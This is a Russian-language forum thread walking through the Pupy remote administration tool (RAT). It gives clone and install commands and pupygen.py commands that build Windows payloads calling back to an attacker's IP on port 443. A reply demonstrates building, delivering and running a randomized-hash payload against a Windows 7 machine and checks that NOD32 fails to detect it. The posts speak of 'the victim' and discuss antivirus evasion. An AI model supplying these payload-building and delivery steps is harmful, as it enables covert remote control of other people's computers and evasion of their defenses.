PUPY Remote Administration Tool (RAT)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ~~DarkNode~~, 15 ноя 2016.

  1. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.

    Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
    Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...

    После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.

    Я считаю что его можно отлично использовать для:
    • security research
    • обучения
    • пентестинга
    • администрирования
    И так давайте все же познакомимся с ним по ближе.
    Создаем PAYLOAD
    Ну для начала скачаем все же и установим зависимости(я делаk на Kali Linux):
    Код (Text):
    git clone https://github.com/n1nj4sec/pupy.git pupy
    cd pupy
    git submodule update --init --depth 1 pupy/payload_templates
    git submodule init
    git submodule update
    pip install -r requirements.txt

    Дальше идем в папку pupy и там нас пока что интересуют только два файла:
    pupygen.py -сам билдер(генератор) так сказать и pupysh.py сама серверная часть,консоль управления.
    PUPY Remote Administration Tool (RAT)

    Я попытаюсь кратко описать функционал,иначе статья будет очень длинная. Одна из фишек этой тулзы это транспорты и скриплеты которые позволяют выбирать тип шифрования трафика ,а скриплеты позволяют запустить какой то модуль сразу же при старте вредоноса(например кейлоггер) Посмотреть список скриплетов и транспортов можно командой
    Код (Text):
     python pupygen.py -l
    PUPY Remote Administration Tool (RAT)
    Cгенерировать бинарник под виндоус систему можно следующей командой:
    Код (Text):
    ./pupygen.py -f exe_x86 -o ~/DarkNode.exe connect --host 192.168.137.137:443
     
    PUPY Remote Administration Tool (RAT)
    После этого парим жертве(правда он скорее всего спалится антивирусом,но в следующих статья я научу его вас обходить,это ознакомительная часть)

    Дальше все очень похоже на метерпретер сессию метаслоита:
    Открываем сессию командой
    Код (Text):
    session -i 1
    пользуемся командамы
    help
    list_modules
    run module_name -h

    PUPY Remote Administration Tool (RAT)
    PUPY Remote Administration Tool (RAT)
    PUPY Remote Administration Tool (RAT)
    PUPY Remote Administration Tool (RAT)

    Спасибо за внимания.C Вами был DarkNode)
     
    Air7771, persivald, Xulinam и 10 другим нравится это.
  2. gURaBA_N

    gURaBA_N Member

    Репутация:
    0
    Регистрация:
    5 ноя 2016
    Сообщения:
    16
    Симпатии:
    4
    ого. классная статья. Понятно все расписанно. Жду тему об обходе антивирей
     
    WebWare Team нравится это.
  3. xXx

    xXx Member

    Репутация:
    0
    Регистрация:
    20 сен 2016
    Сообщения:
    6
    Симпатии:
    4
    Зачет! Понравился результат под системой )))
     
  4. koldonuuchu

    koldonuuchu Active Member
    Grey Team

    Репутация:
    0
    Регистрация:
    4 ноя 2016
    Сообщения:
    38
    Симпатии:
    43
  5. mr RipMars

    mr RipMars New Member

    Репутация:
    0
    Регистрация:
    24 июл 2016
    Сообщения:
    1
    Симпатии:
    0
    Отлично! Побольше бы таких подробных описаний )
     
  6. m0tion

    m0tion Member

    Репутация:
    0
    Регистрация:
    2 окт 2016
    Сообщения:
    16
    Симпатии:
    11
    Мощная вещь. С нетерпетием жду обход АВ.
     
    i_bog_i нравится это.
  7. id2746

    id2746 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    12 ноя 2016
    Сообщения:
    162
    Симпатии:
    193
    Инструмент периодически обновляется и является актуальным на сегодняшний день.

    Пример компрометации для малоопытных пользователей:
    В качастве атакующей систем kali linux 2017.1 с адресом 192.168.43.162
    В качасве атакуемой системы win7 x64 c АВ NOD32.



    Генерируем нагрузку:
    Код (Text):
    ./pupygen.py -f client -O windows -A x64 -o test_for_codeby.exe --randomize-hash connect --host 192.168.43.162:443
    PUPY Remote Administration Tool (RAT)

    Получаем файл (test_for_codeby.exe) с заданными параметрами:
    PUPY Remote Administration Tool (RAT)

    он находится в папке с pupy:
    PUPY Remote Administration Tool (RAT)

    Доставляем файл на целевую систему, после чего из папку с pupy запускаем клиентскую часть:
    Код (Text):
    ./pupysh.py
    PUPY Remote Administration Tool (RAT)


    Проверим файл NOD'ом c обновленными от 13.05.2017г. сигнатурами:
    PUPY Remote Administration Tool (RAT)
    Как видим, всё ОК.


    После запуска файла на целевой системе получаем сессию:
    PUPY Remote Administration Tool (RAT)

    Список команд:
    PUPY Remote Administration Tool (RAT)


    Наш процесс ID и разыв сессии:
    PUPY Remote Administration Tool (RAT)


    Спасибо ~~DarkNode~~ за обзор!!!
    --- Добавлено 13 июн 2017. Первое сообщение размещено 13 июн 2017 ---
    П.С. Мой пост к тому, что благодаря шифрованию и SSL ни брандмауэр ни АВ наш файл не заблокировали.
    Минусом лично для меня является размер файла
    PUPY Remote Administration Tool (RAT)
    --- Добавлено 13 июн 2017 ---
    Еще добавлю.
    В отличие от meterpreter, при разрыве сессии отсутствует необходимость повторной эксплуатации цели (в случае с pupy это повторный запуск вредоносного файла на целевой машине). Т.е. если процесс не был завершен, то достаточно повторно запустить листенер.
     
    Vertigo, ghostphisher, PingVinich и ещё 1-му нравится это.
  8. ghost

    ghost penetration testing
    Grey Team

    Репутация:
    1
    Регистрация:
    12 май 2016
    Сообщения:
    263
    Симпатии:
    292
    Avast детектировал файл test_for_codeby.exe как вирус!
     
    Vertigo и id2746 нравится это.
  9. id2746

    id2746 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    12 ноя 2016
    Сообщения:
    162
    Симпатии:
    193
    Только что сгенерировал с отличными от первого файла параметрами, NOD молчит (тест в virtualbox)
    PUPY Remote Administration Tool (RAT)

    Вчера тестировал на реальной машине - тоже тишина o_O
    На VT не хочу загонять.
     
    Vertigo и ghost нравится это.
  10. ghost

    ghost penetration testing
    Grey Team

    Репутация:
    1
    Регистрация:
    12 май 2016
    Сообщения:
    263
    Симпатии:
    292
    С отключенным антивирем прекрасно работает
     
    id2746 нравится это.
  11. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    302
    сам пользуюсь этой утилитой( как пост эксплуатацией) ..впечатления хорошее, но палится некоторыми антивирусами.
     
    Vertigo и id2746 нравится это.
  12. id2746

    id2746 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    12 ноя 2016
    Сообщения:
    162
    Симпатии:
    193
    на днях сгенерированный файл был спален на целевой системе стандартным виндовым АВ.
     
  13. Ondrik8

    Ondrik8 prodigy
    Grey Team

    Репутация:
    5
    Регистрация:
    8 ноя 2016
    Сообщения:
    475
    Симпатии:
    1.126
    в грей секции полно способов обхода АВ)) моя колонка))
     
    Underwood, WebWare Team и id2746 нравится это.
Загрузка...

Поделиться этой страницей